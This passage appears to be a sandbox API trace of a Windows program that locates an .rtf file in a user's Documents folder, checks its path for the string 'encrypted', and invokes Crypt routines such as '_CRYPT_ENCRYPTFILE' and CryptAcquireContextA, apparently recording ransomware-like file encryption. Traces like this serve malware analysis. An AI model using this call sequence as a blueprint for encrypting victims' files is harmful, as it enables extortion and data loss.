lpString2=".", cchCount2=1) returned 3 [0035.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.063] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.063] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.064] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.064] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce4aaa0, ftCreationTime.dwHighDateTime=0x1d5ba70, ftLastAccessTime.dwLowDateTime=0xf3cf07c0, ftLastAccessTime.dwHighDateTime=0x1d5be20, ftLastWriteTime.dwLowDateTime=0xf3cf07c0, ftLastWriteTime.dwHighDateTime=0x1d5be20, nFileSizeHigh=0x0, nFileSizeLow=0x4284, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MTGgV.rtf", cAlternateFileName="")) returned 0x7c20c0 [0035.064] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.064] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.064] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce4aaa0, ftCreationTime.dwHighDateTime=0x1d5ba70, ftLastAccessTime.dwLowDateTime=0xf3cf07c0, ftLastAccessTime.dwHighDateTime=0x1d5be20, ftLastWriteTime.dwLowDateTime=0xf3cf07c0, ftLastWriteTime.dwHighDateTime=0x1d5be20, nFileSizeHigh=0x0, nFileSizeLow=0x4284, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MTGgV.rtf", cAlternateFileName="")) returned 0x7c20c0 [0035.064] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.064] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MTGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TGgV.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.067] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.067] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.067] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.067] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.067] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.067] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.067] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.067] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.067] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce4aaa0, ftCreationTime.dwHighDateTime=0x1d5ba70, ftLastAccessTime.dwLowDateTime=0xf3cf07c0, ftLastAccessTime.dwHighDateTime=0x1d5be20, ftLastWriteTime.dwLowDateTime=0xf3cf07c0, ftLastWriteTime.dwHighDateTime=0x1d5be20, nFileSizeHigh=0x0, nFileSizeLow=0x4284, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="MTGgV.rtf", cAlternateFileName="")) returned 0x7c2100 [0035.067] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.067] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.067] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.068] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0035.069] CharUpperBuffW (in: 